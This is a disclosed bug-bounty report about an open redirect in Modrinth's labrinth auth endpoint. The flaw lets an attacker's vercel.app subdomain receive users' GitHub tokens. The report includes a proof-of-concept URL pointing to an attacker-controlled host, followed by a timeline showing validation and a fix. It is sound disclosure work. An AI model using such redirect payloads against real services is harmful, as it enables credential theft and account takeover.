Account Takeover in modrinth/labrinth

Valid

Reported on

Oct 15th 2022


Description

A malicious actor can setup a website on vercel.app with the vercel.app domain, after that, they can change the subdomain to something containing modrinth, This will allow a open redirect on https://api.modrinth.com/v2/auth/init?url=ATTACKER_URL, allowing stealing the github token which allows full account takeover.

Proof of Concept

https://api.modrinth.com/v2/auth/init?url=https://test-modrinth.vercel.app/api/hello

Impact

This vulnerability is capable of full account takeover, the user can reset the token of their account but the attacker will have access to the users account until then.

We are processing your report and will contact the modrinth/labrinth team within 24 hours. 2 months ago
modrinth/labrinth maintainer has acknowledged this report 2 months ago
wafflecoffee validated this vulnerability 2 months ago
ZeoNight has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
wafflecoffee marked this as fixed in Not applicable with commit 07edb9 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
wafflecoffee published this vulnerability 2 months ago
to join this conversation